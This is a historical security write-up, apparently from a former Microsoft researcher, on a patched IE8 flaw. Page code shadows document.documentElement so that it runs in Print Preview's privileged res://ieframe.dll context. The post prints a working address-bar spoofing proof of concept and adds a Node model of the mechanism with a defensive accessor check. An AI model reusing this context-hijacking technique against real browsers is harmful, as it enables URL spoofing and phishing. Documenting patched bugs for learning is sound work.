In IE8, Object.defineProperty can redefine members of the page’s document that IE’s own internal dialogs later read. When the Print Preview dialog reads document.documentElement, our getter fires, and because it runs in the context of Print Preview (which lives in the res://ieframe.dll zone), we can open a window on a res:// URL whose address bar shows an arbitrary URL.

<!-- print_preview.html (loaded in an iframe so ExecWB can trigger Print Preview) -->
<script language="JavaScript">
var winRES;   // handle to the res:// window that the getter navigates later

function openWindowAndPrintPreview()
{
    winRES = window.open('res://ieframe.dll/dnserror.htm#http://www.google.com','RES_WINDOW');
    window.open('res://ieframe.dll/dnserror.htm#http://www.google.com','RES_WINDOW');

    // Open Print Preview via the iframe's ExecWB
    frameElement.ExecWB(7 /*OLECMDID_PRINTPREVIEW*/, 0);
}

// Shadow document.documentElement with an accessor. Print Preview reads this member
// while rendering the page, so the getter body runs in its res://ieframe.dll context.
Object.defineProperty(document, "documentElement",{get:function()
{
    winRES.location = "javascript:document.body.innerHTML = '<h1>Hacked!</h1>' + " +
                      "'My real location: <b>' + location.href + '</b>';focus();";
}});
</script>

The documentElement getter is called as soon as Print Preview tries to render the page. At that moment the code executes inside the ieframe.dll context, which has no restriction on navigating res:// windows. The result: a window displaying arbitrary content with http://www.google.com in the address bar. If any internal dialog passes an object reference as an argument to a page member, an RCE path opens up through this same mechanism.
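As an added example (not code from the original post, nor IE's), the following Node script models the mechanism described above, a privileged reader touching a property that the page has turned into an accessor, and shows the check a consumer of untrusted objects can make before reading: refuse instance-level accessors and resolve the member from its built-in prototype definition instead. Doc, renderNaive, readDataProperty and demo are names invented for this example.

```javascript
// Added example, not code from the original post: models in Node the trap the post
// describes. A privileged reader touches a member of an object the page controls; if
// the page has turned that member into an accessor, page code runs in the reader's
// context. Doc, renderNaive, readDataProperty and demo are names invented here.

// Stand-in for the DOM: documentElement is a prototype getter, as in real browsers.
class Doc {
  constructor() { this._root = { tagName: 'HTML' }; }
  get documentElement() { return this._root; }
}

// The trusting reader (the "internal dialog"): a plain property read.
function renderNaive(doc, trace) {
  const root = doc.documentElement;             // runs any page-installed getter
  trace.push('reader saw ' + (root ? root.tagName : 'nothing'));
  return root;
}

// Hardened reader: refuse own accessor properties, then resolve the member from the
// prototype chain (the built-in definition) rather than from the instance.
function readDataProperty(obj, name) {
  const own = Object.getOwnPropertyDescriptor(obj, name);
  if (own && (own.get || own.set)) {
    throw new Error('refusing to read ' + name + ': instance accessor installed');
  }
  if (own) return own.value;
  for (let p = Object.getPrototypeOf(obj); p; p = Object.getPrototypeOf(p)) {
    const d = Object.getOwnPropertyDescriptor(p, name);
    if (d) return d.get ? d.get.call(obj) : d.value;
  }
  return undefined;
}

function demo() {
  const clean = readDataProperty(new Doc(), 'documentElement');  // untampered case
  const doc = new Doc();
  const trace = [];
  // Untrusted page code: shadow the prototype member with an instance accessor.
  Object.defineProperty(doc, 'documentElement', {
    get() { trace.push('page getter ran'); return undefined; },
    configurable: true,
  });
  renderNaive(doc, trace);                       // getter fires inside the reader
  let hardened;
  try { readDataProperty(doc, 'documentElement'); hardened = 'read'; }
  catch (e) { hardened = 'refused'; }
  return { clean, trace, hardened };
}
```

The trace shows the order the post describes: the page's getter runs before the reader ever sees a value, while the hardened reader detects the instance accessor and refuses the object.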

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.